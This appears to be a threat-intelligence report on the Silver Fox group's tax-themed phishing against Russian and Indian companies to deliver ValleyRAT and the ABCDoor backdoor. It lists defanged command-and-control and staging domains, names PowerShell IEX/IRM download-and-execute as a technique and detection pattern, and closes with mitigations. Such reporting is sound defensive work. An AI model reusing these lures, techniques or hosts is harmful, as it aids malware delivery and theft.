Full Report
The Silver Fox group is targeting companies in Russia and India by impersonating tax authorities to distribute ValleyRAT and the new ABCDoor backdoor.
Analysis Summary
# Threat Actor: Silver Fox
## Attribution & Identity
* **Name:** Silver Fox
* **Aliases:** None specified, but the actor is characterized by its use of the **ValleyRAT** malware family and a newly discovered backdoor named **ABCDoor**.
* **Associations:** The group shows high proficiency in social engineering and brand impersonation, specifically mimicking government regulatory and tax bodies.
## Activity Summary
Silver Fox has recently intensified campaigns throughout 2025 (extending into November 2025), targeting organizations in Russia and India. The operations primarily revolve around tax-themed phishing and the distribution of sophisticated backdoors.
* **Early 2025:** Deployment of ValleyRAT via tax-themed lures.
* **May - August 2025:** Diversification of delivery techniques using TinyURL and dynamic arguments in download links to track "channels" (e.g., WhatsApp, phone/dianhua).
* **November 2025:** Shift toward using JavaScript loaders packaged within SFX and ZIP archives to bypass traditional security perimeters.
## Tactics, Techniques & Procedures
* **Phishing & Social Engineering:** Impersonating tax authorities (Russian Federal Tax Service, Indian Central Board of Direct Taxes) and the Ministry of Corporate Affairs (India).
* **Lure Documents:** Use of legitimate-looking executable files (e.g., `GTSuvidha.exe`, `MCA-Ministry.exe`) and malicious PDFs or JS loaders.
* **Staging & Redirection:** Utilization of URL shorteners (TinyURL) to hide the final payload destination.
* **PowerShell Execution:** Use of `IEX` (Invoke-Expression) and `IRM` (Invoke-RestMethod) to download and execute remote scripts directly in memory.
* **Packaging:** Delivery of payloads via Self-Extracting (SFX) archives and ZIP files to evade simple file filters.
* **Tracking:** Use of URL parameters (e.g., `?channel=whatsapp_0826`) to monitor the success of different infection vectors.
## Targeting
* **Sectors:** Industrial companies, services sector, and broader commercial entities dealing with tax compliance.
* **Geography:** Primarily **Russia** and **India**.
* **Victims:** Specific organizations weren't named, but the lures specifically target users of the Indian **MCA** (Ministry of Corporate Affairs) and **CBDT** (Central Board of Direct Taxes) portals.
## Tools & Infrastructure
* **Malware:**
* **ValleyRAT:** A modular remote access trojan.
* **ABCDoor:** A newly identified backdoor capable of remote file manipulation and command execution.
* **NSIS Installers:** Used for establishing remote access connections.
* **Infrastructure:**
* abc.fetish-friends[.]com (Payload delivery)
* vnc.kcii2[.]com (Remote access C2)
* roldco[.]com (Staging/Download)
* sudsmama[.]com (Staging/Download)
* tinyurl[.]com/4nzkync8 (Redirection)
* tinyurl[.]com/bde63yuu (Redirection)
* tinyurl[.]com/322ccxbf (Redirection)
## Implications
Silver Fox represents a persistent regional threat focused on economic hubs. The evolution from ValleyRAT to the bespoke ABCDoor suggests the group is investing in custom development to maintain stealth. Their ability to pivot lures between different geographical tax seasons (Russia vs. India) indicates a highly organized and reactive operation.
## Mitigations
* **File Screening:** Block or scrutinize the execution of SFX archives and JavaScript files arriving via email or external web downloads.
* **PowerShell Monitoring:** Enable PowerShell Constrained Language Mode and log all script block executions (Event ID 4104) to detect `IEX`/`IRM` patterns.
* **Network Filtering:** Monitor and potentially block traffic to known URL shorteners in enterprise environments if not required for business.
* **User Training:** Educate employees in finance and legal departments regarding "tax-themed" social engineering, emphasizing that government bodies rarely deliver software updates via TinyURL links.